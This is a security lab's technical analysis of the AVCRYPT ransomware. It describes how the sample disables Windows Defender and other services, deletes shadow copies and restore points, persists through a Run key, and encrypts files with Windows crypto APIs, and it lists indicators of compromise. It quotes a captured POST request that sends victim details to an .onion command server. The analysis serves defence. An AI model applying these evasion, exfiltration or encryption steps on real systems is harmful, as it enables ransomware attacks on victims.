AVCRYPT Ransomware Technical Analysis

Overview

Here at Sequretek Malware Analysis lab (SMA-LAB) we observed a new type of clever and sophisticated Ransomware variant dubbed as “AVCRYPT” which attempts to uninstall existing security software present on the victim PCs before performing its malevolent activities.

AVCRYPT was discovered by cyber-security researchers which include Lawrence Abrams, MalwareHunterTeam and Michael Gillespie.

Technical Analysis

Advanced Static Analysis

 Tools Used: IDA-Pro, PeID, Resource Hacker etc

Most of the modern malware executables are either obfuscated, encrypted, packed in an attempt to make it harder for anti-malware vendors to detect and analyze them. Our sample is no different, as shown in the figure 1 below, the resource section of the executable seems to be packed as it contains high entropy value as 8.

Figure 1

After analyzing the sample further, we were able to identify file names in the resource section.

Figure 2

Figure 3

Upon further investigation, we were successfully able to extract resources (executables and DLL’s) from the windows binary which seems to be suspicious as shown in figure 3 above.

Figure 4

Figure 4 gives us a clue regarding the sample functionality that it can be a ransomware.

Figure 5

The sample makes use of ShellExecuteExW to execute cmd.exe.

Figure 6

Figure 7

From the Images above, we can Identify that it uses windows registry to Disable Windows Defender.

Figure 8

The sample makes use of windows wmic to delete shadow copies in order to prevent users from restoring their infected systems.

Figure 9

The sample is making changes in registry which disables exe signature checking functionality of the downloaded files of the internet explorer. We can suspect that the sample could try downloading additional malwares on to victims PC.

Figure 10

The executable makes use of victim’s user name to create a executable with the name of the user. Next it creates a bat file.

Figure 11

In order to check the internet connection is available on victims pc it makes use of InternetCheckConnection API. This shows the sample requires active internet connection to proceed further.

Figure 12

The sample makes use of SRRemoveRestorePoint API imported from SRClient.dll in order to delete restore points present on the system.

Figure 13

Figure 14

Disables the essential above services in order to evade the detection and prevents  receiving windows updates.

Figure 15

As shown above the sample makes use of onion website which can be accessed via TOR browser which relates to figure 1.

Behaviour Analysis

Process Information


As shown above, the Malware launches multiple cmd.exe and Sc.exe to accomplish many tasks like

  • Deleting Many Services.
  • Modifying Registry Entries to bring down the Security of the computer.

File Information

The Malware extracts many files to the Temp Folder which is hidden in the Resource section. The Malware moves itself to “AppData” location with the name of the User ex: steve.exe and also with a hidden attribute. It has the Auto-Start capability by creating a Registry entry in the Run location.

Network Communication

Before starting the encryption process, It checks the Network Connection availability by visiting “microsoft.com” which is shown in the screenshot above. After successful Network Connection it sends some information to the Remote Server which is given below.

“POST /index.php HTTP/1.1..Host: bxp44w3qwwrmuupconion:9050..User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)..Referer: bxp44w3qwwrmuupc.onion..Content-Type: application/x-www-form-urlencoded..Content-Length: 105..Accept-Charset: utf-8..Pragma: no-cache..Cache-Control: no-cache..Connection: keep alive….id=1824835925&k=GJhPiOAF8_V0&Zds6JYLf8CebUTpGv1068096&c=India Standard Time&o=Windows 7 Ultimate&m=L”

From the above Post Request, It is clearing shown that the Malware might create an unique for each computer it infects. Then it is obtaining the Time Zone information to find out the location and also the Victims Operating System

Encryption Process

The following Windows API’s were used to perform the Encryption Activity after successful Internet Connection.

File Enumeration

FindFirstFileExW

FindNextFileW

Encryption

Opening the file using CreateFileW. Then it uses CryptAcquireContextW to find out the Default Cryptographic Provider.

CryptCreateHash is used for creating an object for hashing. CALG_MD5 is the Algorithm used for Hashing in our case.

CryptHashData is used for hashing the Data.

CryptDeriveKey is used for Deriving the Key. In our case it is CALG_AES_256.

CryptEncrypt is then finally called to complete the Encryption Process.

After the Encryption Process, it uses MoveFileExW to rename the original file name to a new one appending with “+” that could be found in the Image below

 Conclusion

This Ransomware behaves as its name. It tries to lower the security of the System by deleting multiple services and uses hiding techniques to evade.

Kindly be aware of the suspicious unknown files from un-trusted sources.

Analysed By: Sanjeev Kumar, Priyesh Nargunde, Vidhi Patel.

Indicators of compromise

Filename: av2018.exe

MD5: bd20d8afabe658816d06301b8f367c7e

SHA1: ca99a0cad332fbd5346dc17cef334f741af2f007

SHA256: a64dd2f21a42713131f555bea9d0a76918342d696ef6731608a9dbc57b79b32f

 

No Comments

Post a Comment

Comment
Name
Email
Website